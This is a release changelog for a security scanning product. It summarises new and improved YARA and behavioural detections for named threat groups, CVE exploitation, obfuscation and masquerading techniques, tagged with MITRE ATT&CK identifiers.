  • Added detection for IOCs related to Russian threat group COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto) Reference: https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/

3.5.1 (22/01/24)

YARA

  • Added detection for IOCs linked to Russian and Iranian APT groups such as BlueBravo and Siamesekitten. (G0016, G1001)

  • Added detection for IOCs linked to Iranian OilRig APT. (G0049)

  • Improved detection of Lazarus APT-related IOCs. (G0032)

  • Added detection of Outlook CVE-2023-23397 vulnerability exploitation.

  • Improved identification of remote access software. (T1219)

  • Improved detection of PowerShell scripts loading obfuscated content directly into memory. (T1059.001, T1620)

  • Added detection for archives exploiting the Barracuda ESG vulnerability CVE-2023-2868.

  • Added detection for implants related to Alchimist attack framework.

  • Added detection of pkexec CVE-2021-4034 vulnerability exploitation.

  • Improved detection of various hack tools used for port scanning, brute force, and privilege escalation.

  • Improved detection of mixed casing keywords often used as a way of obfuscation. (T1027)

  • Improved detection of double file extension masquerading in archives such as ZIP or RAR. (T1036.007)

  • Enhanced detection of indicators of various exploitation attempts, including Log4j, SQL Injection, XSS attacks, path traversal attacks, and more. (T1190)

  • Added detection for IOCs found in the exploitation of Ivanti Connect Secure VPN. (CVE-2023-46805, CVE-2024-21887) and more

Dynamo

  • Added detection for scheduled tasks executing Certutil. (T1053.005, S0160)

Other

  • Various FP fixes and performance improvements.
